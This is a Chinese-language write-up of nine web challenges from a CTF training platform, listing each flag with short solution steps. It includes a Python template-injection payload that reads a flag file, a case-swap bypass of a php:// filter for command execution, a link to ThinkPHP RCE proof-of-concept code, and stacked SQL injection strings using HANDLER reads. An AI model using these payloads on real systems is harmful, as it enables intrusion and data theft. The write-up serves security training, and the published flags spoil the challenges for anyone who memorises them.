攻防世界 高手进阶区-WEB
001 baby_web
题目描述:想想初始页面是哪个
flag{very_baby_web}
- 访问题目场景地址
- 网站页面为1.php
- 访问index.php
index在互联网上表示网站的默认主页。
一般为 index.html index.htm index.asp index.php
002 ics-06
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
cyberpeace{0b182d184cb38edde89558d6641d8495}
- 页面只有报表中心可以点击
- 抓包
- 爆破id
003 Training-WWW-Robots
cyberpeace{06f2f9e54285abb764f13a78ca8ecc39}
- 访问在线网站
- 在线翻译一下
在这个小小的培训挑战中,您将了解Robots_Exclusion_Standard。
网络爬虫使用robots.txt文件检查是否允许他们抓取和索引您的网站或只允许部分内容。
有时,这些文件会暴露目录结构,而不是保护内容不被抓取。 好好享受吧!
004 PHP2
cyberpeace{23f0d251c1af2f4b234bc4d8002abc94}
- 查看页面源码和HTTP报文都没得到用的信息。尝试访问index.php,网站也没反应。
phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。
因为用户无法直接通过Web浏览器“看到”php文件的内容,所以需要用phps文件代替。
005 Web_python_template_injection
ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
- 题目为Python模块注入
- 执行命令 …/{{7+7}}
-
说明服务器执行了{{}}里面这一段代码
-
读取flag
%7B%7B''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()%7D%7D
006 Web_php_unserialize
007 php_rce
flag{thinkphp5_rce}
- 题目php_rce
- RCE:远程代码执行漏洞
- ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在没有开启强制路由的情况下可能存在远程代码执行漏洞。攻击者通过该漏洞可能完全控制Web服务器。
thinkphp漏洞
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
008 Web_php_include
其中含有两个参数:
hello参数中的内容会被输出到页面
page参数中的内容则会被进行文件包含,但是会对php://进行过滤
两个函数:
strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。
string:必需。规定被搜索的字符串。
search:必需。规定要搜索的字符串。如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符。
before_search:可选。一个默认值为 “false” 的布尔值。如果设置为 “true”,它将返回 search 参数第一次出现之前的字符串部分。
str_replace(find,replace,string,count):这个函数是用来替换字符串的
find:要查的字符串。
string:原始字符串
绕过方式:
使用大小写绕过的方式:PhP://
这里我们使用伪协议phP://input
php://input是个可以访问请求的原始数据的只读流。可以读取post提交的数据
我们在post提交的内容中写入命令执行(反引号)的php代码:
009 supersqli
字段判断
查询
1’ order by 1 #
1’ order by 2 #
说明SQL语句的字段为2
爆表
联合查询
试着基础的查询
-1’ union select 1,databases #
字符串匹配函数
说明过滤了括号中的关键字,包括我们要用的selecte
先看看supersqli这个数据库
-1’;use supersqli;show tables;#
查看表
-1’;use supersqli;show columns from
1919810931114514
;#
当纯数字字符串是表名的时候需要加反引号`
字段查询
handler查询法
https://www.jb51.net/article/88732.htm
查询
-1’;use supersqli;handler
1919810931114514
open as p;handler p read first;#